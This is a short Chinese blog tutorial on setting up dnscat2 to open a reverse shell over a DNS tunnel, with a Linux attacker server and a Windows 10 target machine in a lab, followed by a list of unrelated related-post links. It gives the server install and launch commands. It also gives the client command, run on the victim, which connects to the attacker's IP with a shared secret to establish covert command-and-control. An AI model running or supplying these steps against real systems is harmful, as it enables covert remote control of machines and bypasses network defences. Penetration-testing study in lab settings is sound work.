使用dnscat2 进行dns隧道反弹shell——直连模式linux对windows

  • 直连模式:客户端直接向指定IP地址的DNS服务器发起DNS解析请求

环境搭建

搭建服务端

git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/server/

gem install bundler

apt-get install ruby-dev

bundle install

过程会有点慢

开启服务端

ruby ./dnscat2.rb

搭建客户端

这里首先需要在Visual Studio 2008中打开一个解决方案:client\win32\dnscat2.vcproj。然后编译就会看到client\win32\Release下有一个dnscat2.exe文件了

将这个文件上传至win10靶机运行

开启客户端

dnscat2.exe --dns server=192.168.227.128,port=53 --secret=9d42a40bfeef7cf1f781326684d4d3e0

剩下的就和linux一样,进入隧道反弹shell,然后ctrl+z返回上一层

进入弹回来的shell

相关推荐
无效的名字2 分钟前
最快速在服务器上搭建代理
运维·服务器
liurunlin8886 分钟前
Linux系统安装部署Tomcat
linux·运维·tomcat
wanhengidc8 分钟前
服务器 数据安全稳定
运维·服务器·数据库·游戏·智能手机
tingting01198 分钟前
linux系统-统计连接数-钉钉告警
linux·数据库·钉钉
JZC_xiaozhong16 分钟前
BPM如何打通“请款→审批→付款”全链路?构建企业资金流转闭环
大数据·运维·数据库·数据分析·数据集成与应用集成·业务流程管理·流程监控
尘觉22 分钟前
OpenClaw 入门:OpenClaw 环境搭建完整指南(Mac / Windows / Linux)(2026-3月最新版)
linux·windows·macos
yeflx23 分钟前
Docker in Docker 实战
运维·docker·容器
xlp666hub24 分钟前
进来看看你对进程虚拟内存的了解有多深?
linux·面试
yann_qu26 分钟前
Mac通过ssh远程连接wsl
linux·windows·macos·ssh·wsl
默|笙26 分钟前
【Linux】库制作与原理(3)_动静态库的链接过程
linux